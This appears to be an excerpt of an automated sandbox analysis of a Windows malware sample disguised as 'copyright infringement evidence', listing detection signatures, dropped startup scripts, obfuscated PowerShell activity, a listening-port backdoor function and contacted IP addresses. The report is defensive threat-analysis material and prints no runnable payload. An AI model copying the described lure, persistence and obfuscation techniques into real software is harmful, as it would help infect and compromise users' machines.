Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CC7CC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF7A18CC7CC
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Searches for user specific document files
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\Public\Documents Jump to behavior
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18B6DF0 getsockname,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00007FF7A18B6DF0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18740C0 bind, 0_2_00007FF7A18740C0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1528568 Sample: copyright_infringement_evid... Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 105 Multi AV Scanner detection for domain / URL 2->105 107 Malicious sample detected (through community Yara rule) 2->107 109 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->109 111 12 other signatures 2->111 9 copyright_infringement_evidence_1.exe 5 2->9         started        14 wscript.exe 2->14         started        16 cmd.exe 2->16         started        18 cmd.exe 2->18         started        process3 dnsIp4 97 172.214.220.82 IFX18747US United States 9->97 99 172.67.158.129 CLOUDFLARENETUS United States 9->99 85 C:\Users\user\AppData\...\start_2x_bee.js.bat, DOS 9->85 dropped 87 C:\Users\user\AppData\...\start_2p_bee.js.bat, DOS 9->87 dropped 89 C:\Users\Public\Documents\2x_bee.js, Unicode 9->89 dropped 91 C:\Users\Public\Documents\2p_bee.js, Unicode 9->91 dropped 135 Drops script or batch files to the startup folder 9->135 20 wscript.exe 1 1 9->20         started        24 wscript.exe 9->24         started        27 cmd.exe 3 2 9->27         started        37 2 other processes 9->37 137 System process connects to network (likely due to code injection or exploit) 14->137 139 Suspicious powershell command line found 14->139 141 Wscript starts Powershell (via cmd or directly) 14->141 39 2 other processes 14->39 29 wscript.exe 16->29         started        31 conhost.exe 16->31         started        33 wscript.exe 18->33         started        35 conhost.exe 18->35         started        file5 signatures6 process7 dnsIp8 95 188.114.96.3 CLOUDFLARENETUS European Union 20->95 113 Suspicious powershell command line found 20->113 115 Wscript starts Powershell (via cmd or directly) 20->115 117 Drops script or batch files to the startup folder 20->117 125 3 other signatures 20->125 41 cmd.exe 20->41         started        44 powershell.exe 20->44         started        83 C:\Users\user\AppData\Roaming\...\CJJ.js, Unicode 24->83 dropped 46 cmd.exe 24->46         started        48 powershell.exe 24->48         started        119 Uses ping.exe to sleep 27->119 121 Uses ping.exe to check the status of other devices and networks 27->121 50 2 other processes 27->50 52 2 other processes 29->52 54 2 other processes 33->54 56 2 other processes 37->56 123 Obfuscated command line found 39->123 58 5 other processes 39->58 file9 signatures10 process11 signatures12 70 3 other processes 41->70 127 Suspicious powershell command line found 44->127 129 Obfuscated command line found 44->129 72 2 other processes 44->72 131 Wscript starts Powershell (via cmd or directly) 46->131 133 Uses ping.exe to sleep 46->133 60 powershell.exe 46->60         started        63 PING.EXE 46->63         started        66 conhost.exe 46->66         started        74 2 other processes 48->74 68 AcroCEF.exe 105 50->68         started        76 5 other processes 52->76 78 5 other processes 54->78 process13 dnsIp14 143 Suspicious powershell command line found 60->143 145 Obfuscated command line found 60->145 147 Found suspicious powershell code related to unpacking or dynamic code loading 60->147 101 127.0.0.1 unknown unknown 63->101 80 AcroCEF.exe 2 68->80         started        103 185.199.109.133 FASTLYUS Netherlands 72->103 signatures15 process16 dnsIp17 93 23.47.168.24 AKAMAI-ASUS United States 80->93
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
23.47.168.24
 unknown United States
16625 AKAMAI-ASUS false
185.199.109.133
 unknown Netherlands
54113 FASTLYUS false
188.114.96.3
 unknown European Union
13335 CLOUDFLARENETUS true
172.214.220.82
 unknown United States
18747 IFX18747US false
172.67.158.129
 unknown United States
13335 CLOUDFLARENETUS false

Private

IP
127.0.0.1